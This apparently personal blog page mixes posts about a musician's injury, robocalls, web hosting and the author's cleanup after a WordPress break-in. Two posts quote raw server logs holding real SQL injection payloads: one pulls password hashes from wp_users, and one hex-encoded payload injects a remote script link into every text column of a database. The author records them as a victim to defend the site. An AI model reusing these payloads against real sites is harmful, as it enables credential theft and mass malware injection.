Mark Turner Dot Net

Aaron Parks posted an update over the weekend about jazz musician Mark Turner’s progress in healing from his recent finger injuries:

Hi everyone,

I know many of you have been asking for more news about Mark’s condition. Out of respect for the privacy of him and his family during this difficult time, I’ve been a bit reluctant to make any more posts about it. Also, there’s a lot of people who have known him for much longer than me and would probably be better chosen for the job of keeping people informed. At this point, though, it seems that this blog has become the primary source for information about what happened, and therefore, it’s the place many people are coming to for information about ways that they can help. It’s with this in mind that I’m writing this post tonight.
Read the rest of this entry »

Rita Mae Brown once said that insanity is “doing the same thing, over and over again, but expecting different results.” I suppose insanity might also mean expecting people to apply critical thinking skills to anything.

I’ve been poking through MT.Net’s logfiles and I’m pleased to see so many searching for the Thomas Jefferson Bank Quote. As of today, MT.Net is the third Google result for those search terms. That’s all fine and good. What drives me up the wall is when I go to the pages linking to the quote, in many cases the linker is presenting the quote as fact, not even reading that I’ve debunked it! Um, did anyone read the post? What kind of fool would link a quote to a post that clearly says the quote is bogus?

No wonder America is falling behind the rest of the world when it comes to using our noggins.

I got back from the James Taylor show to find MT.Net has been Slashdotted. Seems my Caller ID sleuthing in relation to Automotive Warranty Solutions caught someone’s attention.

I also see that I’m missing out on some big money. According to the NC Attorney General’s office, these warranty calls could be worth $500 to $5000 apiece! That’s some serious change in this down economy. Even better, I could invest that money in a lot more SIP phone numbers with which to snare even more fines. And I wouldn’t have to lift a finger to collect (well, I would have to show up for court, but I could earn potentially +$25k for each court case).

Hmm. Passive income paid by scammers … what am I waiting for?

No account of my weekend system administration adventures would be complete without acknowledging the outstanding customer support provided by my blog host provider, VPSFarm.

I emailed VPSFarm’s customer support first thing Saturday morning requesting they shut down my server. This was completed for me in a matter of minutes, and Vinay at VPSFarm sent prompt replies to my emails throughout the entire weekend (even close to midnight). He even provided a tarfile backup of my system. In short, Vinay and VPSFarm went above and beyond the call of duty - far beyond the meager amount of money I spend would justify.

Its easy to be a friend when times are easy, but when the chips are down you find out who your friends really are. Vinay Selvaraj and VPSFarm are the real deal. If you’re looking for an Xen-based Linux box you’d be stupid to look anywhere else.

Bravo Zulu, VPSFarm!

I’ve been working all weekend to seal up the leaks in MT.Net. I feel I’m at a point where things are pretty much back to normal. Passwords have been changed, databases scanned, files examined, and all possible patches have been applied. I went far beyond simply fixing Wordpress: updating the operating system was long overdue, so I did the whole nine yards.

Lessons learned? Whenever strange behavior presents itself, don’t stop hunting until you’re sure you’ve found it all. Sometimes this means ruling every possible thing out, as its very tough (and also very foolish) to say “I’m secure.” Only time can answer that.

If you run a Wordpress site, fire up a MySQL session and run this query:

select * from wp_users where user_login=”WordPress”;

If you find a “WordPress” user, delete it. It doesn’t belong there.

delete from wp_users where user_login=”WordPress”;

Also, you should not have entries in your user table with invalid dates. Delete any users that this query brings back:

select * from wp_users where user_registered like “%0000%”;

I found this page to be useful for the final cleanup.

If you’ve got an MT.Net account (for posting comments, for instance), please take a moment to change it.

Its been a busy weekend here at MT.Net. I’ve been cleaning up the MT.Net webhost after some script kiddies went wild with an exploit. I have a hunch the kiddies attacked an exploit in the Bad Behavior plugin, as the only blogs on my site that were running the BB plugin were the only ones that got pwned. There was a time when the BB plugin started acting funky and needed an upgrade, and it BB would be an obvious target for the bad guys. Fortunately I had copious backups. (I find it interesting that the BB website is offline at the moment.)

If y’all see anything out of place, give me a holla. Its possible I missed something.

Just logged a few of these. Seems this attack has been discussed online before, but surprisingly there’s little information on it.

Note the attempt to get the user passwords from the wp_users table:

216.83.63.254 - - [03/Oct/2008:14:30:38 -0400] “GET /xmlrpc.php HTTP/1.1″ 200 42
“-” “Mozilla/4.0 (k1b compatible; rss 6.0; Windows Sot 5.1 Security Kol)”
216.83.63.254 - - [03/Oct/2008:14:30:39 -0400] “POST /xmlrpc.php HTTP/1.1″ 403 9
70 “-” “Mozilla/4.0 (k1b compatible; rss 6.0; Windows Sot 5.1 Security Kol)”
216.83.63.254 - - [03/Oct/2008:14:30:47 -0400] “POST /wp-trackback.php?tb_id=1 H
TTP/1.1″ 403 984 “-” “Mozilla/4.0 (k1b compatible; rss 6.0; Windows Sot 5.1 Security Kol)”
216.83.63.254 - - [03/Oct/2008:14:30:54 -0400] “GET /index.php?cat=%2527+UNION+S
ELECT+CONCAT(666,CHAR(58),user_pass,CHAR(58),666,CHAR(58))+FROM+wp_users+where+i
d=1/* HTTP/1.1″ 403 295 “-” “Mozilla/4.0 (k1b compatible; rss 6.0; Windows Sot 5.1 Security Kol)”
216.83.63.254 - - [03/Oct/2008:14:30:55 -0400] “GET /index.php?cat=999+UNION+SEL
ECT+null,CONCAT(666,CHAR(58),user_pass,CHAR(58),666,CHAR(58)),null,null,null+FRO
M+wp_users+where+id=1/* HTTP/1.1″ 403 295 “-” “Mozilla/4.0 (k1b compatible; rss
6.0; Windows Sot 5.1 Security Kol)”
216.83.63.254 - - [03/Oct/2008:14:30:55 -0400] “GET /wp-trackback.php?p=1 HTTP/1
.1″ 200 135 “-” “Mozilla/4.0 (k1b compatible; rss 6.0; Windows Sot 5.1 Security Kol)”

I’ve been logging a few attacks on my blog site which put the following into the logfiles:

163.19.104.88 - - [02/Oct/2008:05:57:15 -0400] “GET /?’;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0×4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777332E73733131716E2E636E2F63737273732F6E65772E68746D223E3C2F7363726970743E3C212D2D27272B5B272B40432B275D20776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777332E73733131716E2E636E2F63737273732F6E65772E68746D223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S); HTTP/1.1″ 200 42469 “-” “Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)”

Turns out its a SQL injection attack which is allegedly being carried out by a criminal gang called Rock Phish (or its being carried out by two teenagers pretending to be a “gang”). The attack uses WAITFOR DELAY to see if it worked or not. The user agent and IP addresses change for each attack, so one has to be clever in defending against it. I’ve been blocking the IP when it comes up, but that becomes impractical after a while.
Read the rest of this entry »

Its been nine wonderful years. Happy Anniversary, my love!

You may have noticed I don’t do much posting evenings and weekends. Its not that I don’t want to or have anything to say, its just that I’ve got an ailing laptop that’s been giving my trouble recently.

I’ve known for a while that my Thinkpad T40 doesn’t like to be run anywhere but from a desk. The moment its anything but completely horizontal it promptly zaps its memory - leaving me to reboot the system. Frustrated by its lack of portability, I took it apart last night to see if I could find any visible damage. After an easy disassembly and look-over, I cranked it back up only to have it be even less reliable than before. Now it won’t even boot consistently from a flat surface. That’ll teach me to play technician!
Read the rest of this entry »